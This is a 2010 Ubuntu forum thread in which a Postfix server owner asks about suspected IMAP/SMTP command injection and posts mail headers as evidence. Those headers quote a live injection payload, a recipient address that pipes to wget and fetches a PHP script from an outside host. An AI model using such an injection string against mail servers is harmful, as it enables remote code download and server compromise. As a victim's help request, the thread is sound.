View Full Version : [ubuntu] Postfix injections?

April 15th, 2010, 04:50 AM
I am running Postfix and some Courier services to send and receive email on my Ubuntu server. Lately, I've been getting these strange emails which at first I thought were just spam. I googled some parts of one I got today and found out it could mean I'm being attacked using a technique apparently called Arbitrary IMAP/SMTP Command Injection. After a while of searching, I was not able to find any way to prevent future attacks or even confirm that I am vulnerable.

Can anyone offer some advice?

April 15th, 2010, 10:01 PM

I'd advise you to post the output of postconf -n, some headers and log snippets that cause you to suspect you've had an injection, and maybe something past "I did some googling and found the following ill defined suggestion" as a problem report.

April 16th, 2010, 05:05 AM
I have my email set up to forward to my Gmail. The following is the email that makes me suspect Im under attack.

Delivered-To: ***@gmail.com
Received: by with SMTP id v9cs207801hbg;
Wed, 14 Apr 2010 19:49:01 -0700 (PDT)
Received: by with SMTP id y20mr4371464ebf.74.1271299741314;
Wed, 14 Apr 2010 19:49:01 -0700 (PDT)
Received-SPF: softfail (google.com: best guess record for domain of transitioning blue@****.com does not designate as permitted sender) client-ip=;
Message-ID: <4bc67e9c.1467f10a.4d7c.0753MFETCHER_ADDED@google.c om>
Received: by with POP3 id 20mf116356ewy.29;
Wed, 14 Apr 2010 19:49:00 -0700 (PDT)
X-Gmail-Fetch-Info: ***@***.com 5 mail.***.com 110 blake
Return-Path: <blue@****.com>
X-Original-To: "root+:|wget http://fortunes.in/x1x.php"
Delivered-To: ***@***.com
Received: from bluedick (unknown [])
by mail.***.com (Postfix) with SMTP id D638C28221
for <"root+:|wget http://fortunes.in/x1x.php">; Wed, 14 Apr 2010 21:40:08 -0500 (CDT)

The 'for <"root+:|wget http://fortunes.in/x1x.php">;' is what I Googled around for, which led me to an article about the attack. Any better? Sorry, I just have no clue where to start with this...